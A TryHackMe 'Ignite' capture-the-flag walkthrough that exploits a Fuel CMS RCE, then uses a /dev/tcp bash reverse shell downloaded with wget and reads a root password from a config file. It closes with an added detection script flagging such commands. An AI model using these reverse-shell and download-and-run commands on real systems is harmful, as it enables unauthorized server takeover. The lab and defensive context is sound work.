
TryHackMe|Ignite WriteUp\Walkthrough (English)

Ignite

Room Link: https://tryhackme.com/room/ignite

  • Run sudo nmap IP -vv. You will notice that only port 80 is open, even if you scan all ports.
  • The home page contains several important pieces of information. First, it gives you the credentials for the admin. It also gives you the location of the database file.
  • Running gobuster turns up nothing important among the hidden files. In robots.txt you will find a /fuel/ folder. If you sign in and poke around, you will not find much.
  • The home page also gives you the version of the CMS. Run searchsploit fuel cms and you will get 3 different exploits for the same version. Use 50477, because the other 2 have many problems in the code. Run searchsploit -m 50477 to copy the exploit to your current directory, then rename it, purely for convenience: mv 50477.py fuel.py.
  • To run the exploit, use python3 fuel.py -u http://IP. You will get a prompt to enter commands; try different commands such as cd, ls and so on. Once you are sure that you can run different commands, use this shell to get a reverse shell connection from the target. Start a listener on your own machine: nc -nlvp 9001. On the target machine you will use this one-line reverse shell: bash -i >& /dev/tcp/yourIP/9001 0>&1. If you try to run it as is, it won't work.
  • To make the reverse shell work, save it in a file on your own machine, then use wget to download it onto the victim's machine. Check with ls that it downloaded successfully. After that, run chmod +x shell.sh, then run it with bash shell.sh.
  • You will get a shell back on your machine. Run cd /home/www-data and you will find the user flag ✨.
  • For the root flag, go to the file mentioned in step 2: cd /var/www/html/fuel/application/config, then cat database.php, and you will find the root password. Run su root. It may require a terminal session, so first use python3 -c 'import pty; pty.spawn("/bin/bash")', then provide the password ******. Navigate to /root and retrieve the root flag ✨.
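
From the defender's side, the steps above leave a clear trail: the web-server account runs wget, an interactive bash, a Python pty upgrade and su. The following is an added example, not part of the original write-up. It assumes process listings in the format of ps -eo user=,args=; the function names, rule labels and sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the write-up). Reads "USER COMMAND..." lines, the
# format printed by `ps -eo user=,args=`, and reports commands run by the
# web-server account that match the post-exploitation steps above.
flag_webuser_shells() {
    web_user="${1:-www-data}"   # assumption: the web server runs as www-data
    awk -v u="$web_user" '
        $1 != u { next }                       # only the account under watch
        {
            cmd = $0
            sub(/^[^ ]+ +/, "", cmd)           # drop the user column
            why = ""
            if      (cmd ~ "/dev/tcp/")                 why = "dev-tcp-redirect"
            else if (cmd ~ "pty[.]spawn")               why = "pty-upgrade"
            else if (cmd ~ "(^|[ /])(bash|sh) -i( |$)") why = "interactive-shell"
            else if (cmd ~ "(^|[ /])(wget|curl) ")      why = "download-tool"
            else if (cmd ~ "(^|[ /])su( |$)")           why = "su-attempt"
            if (why != "") printf "%s\t%s\n", why, cmd
        }'
}

# Constructed sample input; 192.0.2.10 is a documentation address.
sample_ps() {
    cat <<'EOF'
root     /usr/sbin/apache2 -k start
www-data /usr/sbin/apache2 -k start
www-data sh -c bash -i >& /dev/tcp/192.0.2.10/9001 0>&1
www-data wget http://192.0.2.10/shell.sh
www-data bash shell.sh
www-data bash -i
www-data python3 -c import pty; pty.spawn("/bin/bash")
www-data su root
root     bash -i
EOF
}

sample_ps | flag_webuser_shells
```

On a live host the same function can be fed with ps -eo user=,args= | flag_webuser_shells. A process snapshot only catches what is running at that moment, so the same patterns are better applied to exec audit logs where those are available.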
